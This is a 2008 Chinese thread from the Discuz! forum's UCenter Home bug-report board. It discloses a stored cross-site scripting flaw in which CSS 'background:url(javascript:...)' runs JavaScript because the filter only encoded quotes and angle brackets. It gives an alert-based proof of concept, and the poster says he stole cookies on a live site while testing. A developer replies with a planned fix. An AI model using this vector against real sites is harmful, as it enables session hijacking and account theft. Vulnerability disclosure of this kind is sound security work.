设为首页收藏本站
切换到宽版

Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
Discuz!官方免费开源建站系统»论坛 增值产品交流与讨论 UCenter Home 专区 UCenter Home-BUG 反馈 严重跨站漏洞
返回列表 发新帖

[已经确认] 严重跨站漏洞

[复制链接]
刘天宇 发表于 2008-8-4 01:42:33 | 显示全部楼层 |阅读模式
注意背景音乐 http://www.cxzhe.com/?3
因为在5G测试偷COOKIES,我都被波波封了一次了
http://www.5gsns.com/space-718-do-blog-id-11854.html

原因:CSS里可以执行JS,而UCH只替换了 " < > 改成相应%22 %3C %3E 就能执行了
<style type="text/css">
body{
background:url(javascript:alert("xxxsss"));
}
</style>

[ 本帖最后由 刘天宇 于 2008-8-4 01:45 编辑 ]
回复

使用道具 举报

茄子 发表于 2008-8-4 09:47:43 | 显示全部楼层
下个版本会在用户组里面进行限制
回复

使用道具 举报

 楼主| 刘天宇 发表于 2008-8-12 13:51:18 | 显示全部楼层
http://www.im286.net/space.php?uid=199072
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-11-15 14:54 , Processed in 0.026608 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表